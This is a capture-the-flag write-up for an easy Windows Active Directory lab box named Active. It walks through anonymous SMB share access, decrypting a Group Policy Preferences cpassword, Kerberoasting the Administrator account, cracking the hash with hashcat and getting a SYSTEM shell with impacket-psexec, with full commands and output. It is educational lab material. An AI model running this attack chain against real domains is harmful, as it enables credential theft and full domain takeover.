Introduction
Active is an easy Windows box and one of the best “first real Active Directory” machines on the platform, because it teaches two techniques you will use on almost every AD engagement: recovering a Group Policy Preferences (GPP) cpassword, and Kerberoasting.
The chain is short and entirely credential-driven. There is no SSH, no WinRM, no RDP, so from the very start we know we are not getting an interactive shell the easy way; everything happens over SMB and Kerberos. Anonymous SMB access lets us read the Replication share, which is an exposed copy of SYSVOL, and buried in it is a Groups.xml file with an encrypted password. Microsoft published the AES key that encrypts these years ago, so decrypting it is instant, and it hands us the svc_tgs account. From there, the Domain Administrator account has been misconfigured with a Service Principal Name, which makes it Kerberoastable: we request its service ticket, crack it offline, and log in as Administrator.
Enumeration
echo "<target_ip> active.htb" | sudo tee -a /etc/hostsService Discovery
sudo nmap active.htb -T4 --min-rate 3500 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389 -sC -sV -oN scans/service-scan.nmapPORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows Server 2008 R2 SP1A domain controller for active.htb running the old Windows Server 2008 R2. The important observation is what is missing: no 22 (SSH), no 5985 (WinRM), no 3389 (RDP). Whatever credentials we find, we will have to use them against SMB, LDAP, and Kerberos rather than expecting a shell service. That single fact decides the whole route to root.
SMB shares as anonymous
The first check on any DC is anonymous SMB. It worked, and one share stands out.
nxc smb active.htb -u '' -p '' --sharesShare Permissions Remark
----- ----------- ------
ADMIN$
C$
IPC$
NETLOGON
Replication READ
SYSVOL
UsersReplication is readable with a null session. That name is a giveaway: it is a copy of SYSVOL, the domain-wide share where Group Policy lives, and legacy Group Policy Preferences are the classic place to find a stored password.
Foothold
Looting the GPP cpassword
I pulled the whole share down recursively and went hunting for the Groups.xml that GPP uses to push local users.
smbclient //active.htb/Replication -N
# recurse ON; prompt OFF; mget * ... then browse to:
# active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xmlGroups.xml contained exactly what we were hoping for: a user entry with a cpassword attribute.
<User ... name="active.htb\SVC_TGS" ...>
<Properties action="U" ... cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
userName="active.htb\SVC_TGS"/>
</User>cpassword is an AES-256 encrypted password, and here is the whole point of the technique: in MS14-025, Microsoft published the private AES key used to encrypt these values. So the “encryption” is effectively reversible by anyone. gpp-decrypt has the key baked in.
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18We now have svc_tgs:GPPstillStandingStrong2k18.
Documented dead ends (for completeness): the same policy tree held
GptTmpl.inf(just the domain password policy) and aRegistry.polthat decoded to an EFS certificate blob. I looked at both because they were there, but neither led anywhere. Worth a glance, not worth an hour.
Validating the credential with NetExec confirms it and upgrades our SMB access. svc_tgs can now read SYSVOL and Users (so the user flag is reachable on the Users share), and it shows the domain has no account lockout (Account Lockout Threshold: None), which means the Kerberos attack coming next is safe to run.
nxc smb active.htb -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' --shares --usersPrivilege Escalation — Kerberoasting
svc_tgs is a plain domain user with no obvious way up, and remember there is no shell service to log into. But any authenticated domain user can request a Kerberos service ticket (TGS) for any account that has a Service Principal Name, and that ticket is encrypted with the target account’s password hash. Request it, and you can crack it offline. This is Kerberoasting.
Impacket’s GetUserSPNs asks the DC for every account with an SPN and requests their tickets in one shot.
impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip <target_ip> -request -outputfile kerberoast.hashesServicePrincipalName Name MemberOf
-------------------- ------------- --------------------------------------------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htbThis is the misconfiguration that makes the box: the account with the SPN active/CIFS is Administrator itself. Normally SPNs live on low-value service accounts; putting one on the Domain Admin means its password hash is now crackable by any user. We got its TGS hash.
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$4f6d8dbca473c9cb0d32d94ae30b9cb9$88dd9da8...Crack it with hashcat (mode 13100 = Kerberoast TGS-REP) against rockyou.
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$...:Ticketmaster1968Administrator:Ticketmaster1968. Since Administrator is a local admin on the DC and there is no shell service, we use SMB itself: Impacket’s psexec gives a SYSTEM shell over 445.
impacket-psexec active.htb/administrator:Ticketmaster1968@<target_ip>
C:\Windows\system32> whoami
nt authority\systemMachine rooted.
Attack Chain Recap
nmap -> DC active.htb (2008 R2), no SSH/WinRM/RDP
nxc smb -u '' -p '' --shares -> Replication readable (null session)
loot Replication (SYSVOL copy) -> Groups.xml with GPP cpassword
gpp-decrypt (MS14-025 leaked key) -> svc_tgs:GPPstillStandingStrong2k18
GetUserSPNs -request -> Administrator has SPN active/CIFS -> TGS hash
hashcat -m 13100 -> Administrator:Ticketmaster1968
impacket-psexec -> NT AUTHORITY\SYSTEMKey takeaways
- Read the missing ports. No SSH/WinRM/RDP told me up front that this box is won over SMB and Kerberos, not by grabbing a shell. Absent services are enumeration too.
- GPP cpassword is “encrypted” in name only. MS14-025 leaked the AES key, so any
cpasswordin a readable SYSVOL/Replication share is a free credential. Always checkPolicies\...\Preferences\Groups\Groups.xml. - Kerberoast every SPN, and read whose it is. The whole privesc was noticing that the SPN belonged to Administrator. A privileged account with an SPN is a direct offline crack to Domain Admin.
- No shell service is not a dead end.
impacket-psexec/wmiexecturn admin credentials into a SYSTEM shell over SMB when RDP/WinRM are closed.